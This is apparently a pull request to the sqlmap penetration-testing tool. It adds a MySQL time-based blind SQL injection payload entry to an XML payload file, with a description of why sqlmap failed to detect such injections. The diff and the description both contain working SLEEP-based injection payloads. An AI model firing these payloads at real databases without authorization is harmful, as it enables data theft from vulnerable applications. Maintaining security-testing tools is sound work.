### PR TITLE
Add custom time based sql injection payload

### DIFF
--- a/xml/payloads/time_blind.xml
+++ b/xml/payloads/time_blind.xml
@@ -105,6 +105,26 @@
     </test>
 
     <test>
+        <title>MySQL &gt;= 5.0.12 AND time-based blind (query CUSTOM_1 SLEEP)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
         <title>MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP)</title>
         <stype>5</stype>
         <level>2</level>


### PR DESCRIPTION
Hello, folks!

During lots of penetration tests I spot a case when BurpSuite Scanner finds a time based sql injection with the following payload:

`'(select*from(select(sleep(9)))a)` (without AND or OR operators at the beginning!)

Regardless of the used levels and risk values (with or without WAF, tested tons of times) sqlmap is unable to successfully identify an injection point which is due to the absence of the payload which I suggest to add. 

After adding the mentioned above payload, sqlmap starts working like a charm making it possible to identify such cases and successfully fetch database entries out of the box!

Please review the commit with the highest degree of diligence. 
From my point of view the community should have it to get sqlmap working with the described cases out of the box.

Best regards, Aleh Boitsau